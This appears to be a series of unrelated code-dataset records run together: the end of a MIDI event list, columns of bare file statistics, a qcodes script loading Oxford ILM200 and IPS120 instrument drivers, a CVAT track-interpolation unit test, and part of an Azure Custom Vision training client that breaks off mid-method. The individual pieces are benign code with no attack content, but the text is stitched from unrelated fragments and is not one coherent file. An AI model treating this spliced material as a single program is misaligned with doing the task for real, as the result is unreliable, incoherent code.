NoteOnEvent(tick=206, channel=0, pitch=55, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=64, velocity=84),
NoteOnEvent(tick=0, channel=0, pitch=55, velocity=79),
NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=64, velocity=76),
NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=64, velocity=74),
NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=64, velocity=77),
NoteOnEvent(tick=206, channel=0, pitch=55, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=64, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=75),
NoteOnEvent(tick=0, channel=0, pitch=55, velocity=78),
NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=74),
NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=64, velocity=81),
NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=70),
NoteOnEvent(tick=206, channel=0, pitch=55, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=62, velocity=0),
NoteOnEvent(tick=25, channel=0, pitch=60, velocity=73),
NoteOnEvent(tick=0, channel=0, pitch=52, velocity=72),
NoteOnEvent(tick=974, channel=0, pitch=60, velocity=0),
NoteOnEvent(tick=0, channel=0, pitch=52, velocity=0),
EndOfTrackMetaEvent(tick=1)]])
| 55.402439
| 72
| 0.727933
| 693
| 4,543
| 4.767677
| 0.096681
| 0.176755
| 0.267554
| 0.239709
| 0.889225
| 0.889225
| 0.837772
| 0.837772
| 0.767252
| 0.767252
| 0
| 0.120461
| 0.102796
| 4,543
| 81
| 73
| 56.08642
| 0.690137
| 0
| 0
| 0.475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025
| 0
| 0.025
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b99bd3b92b519f97dbae3f9de4f6bd514101848e
| 1,194
|
py
|
Python
|
simple_codes.py
|
takafumifujita/qcodes-driver-test-TF
|
75cb0cb44a82dd62de8872698ced7dbd16c104dc
|
[
"MIT"
] | null | null | null |
simple_codes.py
|
takafumifujita/qcodes-driver-test-TF
|
75cb0cb44a82dd62de8872698ced7dbd16c104dc
|
[
"MIT"
] | null | null | null |
simple_codes.py
|
takafumifujita/qcodes-driver-test-TF
|
75cb0cb44a82dd62de8872698ced7dbd16c104dc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 14 11:31:28 2016
@author: tfujita
"""
#%% ILM
#%% First load
import qcodes
import qcodes.instrument_drivers.oxford.ILM200 as ILM200
server_name = None
helium = ILM200.OxfordInstruments_ILM200(name='helium', address='ASRL4::INSTR', server_name=server_name)
#%% Reloading
helium.close()
from imp import reload
reload(qcodes.instrument_drivers.oxford.ILM200)
import qcodes.instrument_drivers.oxford.ILM200 as ILM200
server_name = None
helium = ILM200.OxfordInstruments_ILM200(name='helium', address='ASRL4::INSTR', server_name=server_name)
#%%
self = helium
self.visa_handle.bytes_in_buffer
#%%
#%% IPS
import qcodes
import qcodes.instrument_drivers.oxford.IPS120 as IPS120
server_name = None
magnet = IPS120.OxfordInstruments_IPS120(name='magnet', address='ASRL4::INSTR', server_name=server_name)
#%% Reloading
magnet.close()
from imp import reload
reload(qcodes.instrument_drivers.oxford.IPS120)
import qcodes.instrument_drivers.oxford.IPS120 as IPS120
server_name = None
magnet = IPS120.OxfordInstruments_IPS120(name='magnet', address='ASRL4::INSTR', server_name=server_name)
#%%
self = magnet
self.visa_handle.bytes_in_buffer
| 20.586207
| 104
| 0.779732
| 160
| 1,194
| 5.64375
| 0.2875
| 0.13289
| 0.152824
| 0.192691
| 0.90144
| 0.888151
| 0.82835
| 0.801772
| 0.772979
| 0.772979
| 0
| 0.066231
| 0.102178
| 1,194
| 57
| 105
| 20.947368
| 0.776119
| 0.109715
| 0
| 0.75
| 0
| 0
| 0.068768
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
b9bbd6f0b8648af296ef3bfda076899cccae66d7
| 9,419
|
py
|
Python
|
cvat/apps/dataset_manager/tests/test_annotation.py
|
gitibharatibiswal/cvat-adas-team
|
a33c1ae38d79ed6e35a61a97b74cd2978853e4c2
|
[
"Intel",
"MIT"
] | 2
|
2022-03-13T03:45:15.000Z
|
2022-03-13T03:46:19.000Z
|
cvat/apps/dataset_manager/tests/test_annotation.py
|
gitibharatibiswal/cvat-adas-team
|
a33c1ae38d79ed6e35a61a97b74cd2978853e4c2
|
[
"Intel",
"MIT"
] | 9
|
2021-07-15T13:42:33.000Z
|
2021-09-22T12:43:07.000Z
|
cvat/apps/dataset_manager/tests/test_annotation.py
|
gitibharatibiswal/cvat-adas-team
|
a33c1ae38d79ed6e35a61a97b74cd2978853e4c2
|
[
"Intel",
"MIT"
] | 41
|
2020-12-16T05:52:41.000Z
|
2021-09-23T08:45:16.000Z
|
# Copyright (C) 2020 Intel Corporation
#
# SPDX-License-Identifier: MIT
from cvat.apps.dataset_manager.annotation import TrackManager
from unittest import TestCase
class TrackManagerTest(TestCase):
def _check_interpolation(self, track):
interpolated = TrackManager.get_interpolated_shapes(track, 0, 7)
self.assertEqual(len(interpolated), 6)
self.assertTrue(interpolated[0]["keyframe"])
self.assertFalse(interpolated[1]["keyframe"])
self.assertTrue(interpolated[2]["keyframe"])
self.assertTrue(interpolated[3]["keyframe"])
self.assertFalse(interpolated[4]["keyframe"])
self.assertFalse(interpolated[5]["keyframe"])
def test_point_interpolation(self):
track = {
"frame": 0,
"label_id": 0,
"group": None,
"source": "manual",
"attributes": [],
"shapes": [
{
"frame": 0,
"points": [1.0, 2.0],
"type": "points",
"occluded": False,
"outside": False,
"attributes": []
},
{
"frame": 2,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0],
"type": "points",
"occluded": False,
"outside": True
},
{
"frame": 4,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0],
"type": "points",
"occluded": False,
"outside": False
},
]
}
self._check_interpolation(track)
def test_polygon_interpolation(self):
track = {
"frame": 0,
"label_id": 0,
"group": None,
"attributes": [],
"source": "manual",
"shapes": [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0, 5.0, 2.0],
"type": "polygon",
"occluded": False,
"outside": False,
"attributes": []
},
{
"frame": 2,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0, 7.0, 6.0, 4.0, 5.0],
"type": "polygon",
"occluded": False,
"outside": True
},
{
"frame": 4,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0, 7.0, 6.0, 4.0, 5.0],
"type": "polygon",
"occluded": False,
"outside": False
},
]
}
self._check_interpolation(track)
def test_bbox_interpolation(self):
track = {
"frame": 0,
"label_id": 0,
"group": None,
"attributes": [],
"source": "manual",
"shapes": [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0],
"type": "rectangle",
"occluded": False,
"outside": False,
"attributes": []
},
{
"frame": 2,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0],
"type": "rectangle",
"occluded": False,
"outside": True
},
{
"frame": 4,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0],
"type": "rectangle",
"occluded": False,
"outside": False
},
]
}
self._check_interpolation(track)
def test_line_interpolation(self):
track = {
"frame": 0,
"label_id": 0,
"group": None,
"attributes": [],
"source": "manual",
"shapes": [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
"type": "polyline",
"occluded": False,
"outside": False,
"attributes": []
},
{
"frame": 2,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0],
"type": "polyline",
"occluded": False,
"outside": True
},
{
"frame": 4,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0],
"type": "polyline",
"occluded": False,
"outside": False
},
]
}
self._check_interpolation(track)
def test_outside_bbox_interpolation(self):
track = {
"frame": 0,
"label_id": 0,
"group": None,
"attributes": [],
"source": "manual",
"shapes": [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0],
"type": "rectangle",
"occluded": False,
"outside": False,
"attributes": []
},
{
"frame": 2,
"points": [3.0, 4.0, 5.0, 6.0],
"type": "rectangle",
"occluded": False,
"outside": True,
"attributes": [],
},
{
"frame": 4,
"points": [5.0, 6.0, 7.0, 8.0],
"type": "rectangle",
"occluded": False,
"outside": True,
"attributes": []
}
]
}
expected_shapes = [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0],
"type": "rectangle",
"occluded": False,
"outside": False,
"attributes": [],
"keyframe": True
},
{
"frame": 1,
"points": [2.0, 3.0, 4.0, 5.0],
"type": "rectangle",
"occluded": False,
"outside": False,
"attributes": [],
"keyframe": False
},
{
"frame": 2,
"points": [3.0, 4.0, 5.0, 6.0],
"type": "rectangle",
"occluded": False,
"outside": True,
"attributes": [],
"keyframe": True
},
{
"frame": 4,
"points": [5.0, 6.0, 7.0, 8.0],
"type": "rectangle",
"occluded": False,
"outside": True,
"attributes": [],
"keyframe": True
}
]
interpolated_shapes = TrackManager.get_interpolated_shapes(track, 0, 5)
self.assertEqual(expected_shapes, interpolated_shapes)
def test_outside_polygon_interpolation(self):
track = {
"frame": 0,
"label_id": 0,
"group": None,
"attributes": [],
"source": "manual",
"shapes": [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
"type": "polygon",
"occluded": False,
"outside": False,
"attributes": []
},
{
"frame": 2,
"points": [3.0, 4.0, 5.0, 6.0, 7.0, 8.0],
"type": "polygon",
"occluded": False,
"outside": True,
"attributes": []
}
]
}
expected_shapes = [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
"type": "polygon",
"occluded": False,
"outside": False,
"attributes": [],
"keyframe": True
},
{
"frame": 1,
"points": [2.0, 3.0, 4.0, 5.0, 6.0, 7.0],
"type": "polygon",
"occluded": False,
"outside": False,
"attributes": [],
"keyframe": False
},
{
"frame": 2,
"points": [3.0, 4.0, 5.0, 6.0, 7.0, 8.0],
"type": "polygon",
"occluded": False,
"outside": True,
"attributes": [],
"keyframe": True
}
]
interpolated_shapes = TrackManager.get_interpolated_shapes(track, 0, 3)
self.assertEqual(expected_shapes, interpolated_shapes)
| 30.781046
| 79
| 0.331776
| 712
| 9,419
| 4.325843
| 0.091292
| 0.038961
| 0.155844
| 0.027273
| 0.833766
| 0.833766
| 0.790584
| 0.787338
| 0.780195
| 0.772403
| 0
| 0.06393
| 0.526701
| 9,419
| 305
| 80
| 30.881967
| 0.626963
| 0.006901
| 0
| 0.696113
| 0
| 0
| 0.163422
| 0
| 0
| 0
| 0
| 0
| 0.031802
| 1
| 0.024735
| false
| 0
| 0.007067
| 0
| 0.035336
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9c93e6cd9d835b043e12de4a1ef06b0db855651
| 133,264
|
py
|
Python
|
sdk/cognitiveservices/azure-cognitiveservices-vision-customvision/azure/cognitiveservices/vision/customvision/training/operations/_custom_vision_training_client_operations.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 1
|
2020-12-10T03:17:51.000Z
|
2020-12-10T03:17:51.000Z
|
sdk/cognitiveservices/azure-cognitiveservices-vision-customvision/azure/cognitiveservices/vision/customvision/training/operations/_custom_vision_training_client_operations.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 226
|
2019-07-24T07:57:21.000Z
|
2019-10-15T01:07:24.000Z
|
sdk/cognitiveservices/azure-cognitiveservices-vision-customvision/azure/cognitiveservices/vision/customvision/training/operations/_custom_vision_training_client_operations.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class CustomVisionTrainingClientOperationsMixin(object):
def get_domains(
self, custom_headers=None, raw=False, **operation_config):
"""Get a list of the available domains.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.Domain]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_domains.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Domain]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_domains.metadata = {'url': '/domains'}
def get_domain(
self, domain_id, custom_headers=None, raw=False, **operation_config):
"""Get information about a specific domain.
:param domain_id: The id of the domain to get information about.
:type domain_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Domain or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Domain or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_domain.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'domainId': self._serialize.url("domain_id", domain_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Domain', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_domain.metadata = {'url': '/domains/{domainId}'}
def get_projects(
self, custom_headers=None, raw=False, **operation_config):
"""Get your projects.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.Project]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_projects.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Project]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_projects.metadata = {'url': '/projects'}
def create_project(
self, name, description=None, domain_id=None, classification_type=None, target_export_platforms=None, custom_headers=None, raw=False, **operation_config):
"""Create a project.
:param name: Name of the project.
:type name: str
:param description: The description of the project.
:type description: str
:param domain_id: The id of the domain to use for this project.
Defaults to General.
:type domain_id: str
:param classification_type: The type of classifier to create for this
project. Possible values include: 'Multiclass', 'Multilabel'
:type classification_type: str
:param target_export_platforms: List of platforms the trained model is
intending exporting to.
:type target_export_platforms: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Project or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Project
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.create_project.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['name'] = self._serialize.query("name", name, 'str')
if description is not None:
query_parameters['description'] = self._serialize.query("description", description, 'str')
if domain_id is not None:
query_parameters['domainId'] = self._serialize.query("domain_id", domain_id, 'str')
if classification_type is not None:
query_parameters['classificationType'] = self._serialize.query("classification_type", classification_type, 'str')
if target_export_platforms is not None:
query_parameters['targetExportPlatforms'] = self._serialize.query("target_export_platforms", target_export_platforms, '[str]', div=',')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Project', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_project.metadata = {'url': '/projects'}
def get_project(
self, project_id, custom_headers=None, raw=False, **operation_config):
"""Get a specific project.
:param project_id: The id of the project to get.
:type project_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Project or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Project
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_project.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Project', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_project.metadata = {'url': '/projects/{projectId}'}
def delete_project(
self, project_id, custom_headers=None, raw=False, **operation_config):
"""Delete a specific project.
:param project_id: The project id.
:type project_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.delete_project.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.CustomVisionErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_project.metadata = {'url': '/projects/{projectId}'}
def update_project(
self, project_id, updated_project, custom_headers=None, raw=False, **operation_config):
"""Update a specific project.
:param project_id: The id of the project to update.
:type project_id: str
:param updated_project: The updated project model.
:type updated_project:
~azure.cognitiveservices.vision.customvision.training.models.Project
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Project or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Project
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.update_project.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(updated_project, 'Project')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Project', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
update_project.metadata = {'url': '/projects/{projectId}'}
def export_project(
self, project_id, custom_headers=None, raw=False, **operation_config):
"""Exports a project.
:param project_id: The project id of the project to export.
:type project_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ProjectExport or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ProjectExport
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.export_project.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ProjectExport', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
export_project.metadata = {'url': '/projects/{projectId}/export'}
def create_images_from_data(
self, project_id, image_data, tag_ids=None, custom_headers=None, raw=False, **operation_config):
"""Add the provided images to the set of training images.
This API accepts body content as multipart/form-data and
application/octet-stream. When using multipart
multiple image files can be sent at once, with a maximum of 64 files.
:param project_id: The project id.
:type project_id: str
:param image_data: Binary image data. Supported formats are JPEG, GIF,
PNG, and BMP. Supports images up to 6MB.
:type image_data: Generator
:param tag_ids: The tags ids with which to tag each image. Limited to
20.
:type tag_ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImageCreateSummary or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImageCreateSummary
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.create_images_from_data.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if tag_ids is not None:
query_parameters['tagIds'] = self._serialize.query("tag_ids", tag_ids, '[str]', div=',', max_items=20, min_items=0)
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'multipart/form-data'
if custom_headers:
header_parameters.update(custom_headers)
# Construct form data
form_data_content = {
'imageData': image_data,
}
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, form_content=form_data_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImageCreateSummary', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_images_from_data.metadata = {'url': '/projects/{projectId}/images'}
def delete_images(
self, project_id, image_ids=None, all_images=None, all_iterations=None, custom_headers=None, raw=False, **operation_config):
"""Delete images from the set of training images.
:param project_id: The project id.
:type project_id: str
:param image_ids: Ids of the images to be deleted. Limited to 256
images per batch.
:type image_ids: list[str]
:param all_images: Flag to specify delete all images, specify this
flag or a list of images. Using this flag will return a 202 response
to indicate the images are being deleted.
:type all_images: bool
:param all_iterations: Removes these images from all iterations, not
just the current workspace. Using this flag will return a 202 response
to indicate the images are being deleted.
:type all_iterations: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.delete_images.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if image_ids is not None:
query_parameters['imageIds'] = self._serialize.query("image_ids", image_ids, '[str]', div=',', max_items=256, min_items=0)
if all_images is not None:
query_parameters['allImages'] = self._serialize.query("all_images", all_images, 'bool')
if all_iterations is not None:
query_parameters['allIterations'] = self._serialize.query("all_iterations", all_iterations, 'bool')
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
raise models.CustomVisionErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_images.metadata = {'url': '/projects/{projectId}/images'}
def get_image_region_proposals(
self, project_id, image_id, custom_headers=None, raw=False, **operation_config):
"""Get region proposals for an image. Returns empty array if no proposals
are found.
This API will get region proposals for an image along with confidences
for the region. It returns an empty array if no proposals are found.
:param project_id: The project id.
:type project_id: str
:param image_id: The image id.
:type image_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImageRegionProposal or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImageRegionProposal
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_image_region_proposals.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'imageId': self._serialize.url("image_id", image_id, 'str')
}
